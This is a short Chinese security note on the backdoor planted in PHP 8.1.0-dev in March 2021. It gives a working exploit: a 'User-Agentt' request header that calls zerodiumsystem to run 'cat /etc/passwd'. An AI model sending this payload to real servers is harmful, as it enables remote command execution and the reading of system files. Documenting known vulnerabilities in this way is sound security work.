PHP-8.1.0-dev 后门命令执行

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 

添加请求头

User-Agentt: zerodiumsystem("cat /etc/passwd");

原文地址:https://www.cnblogs.com/0day-li/p/15128891.html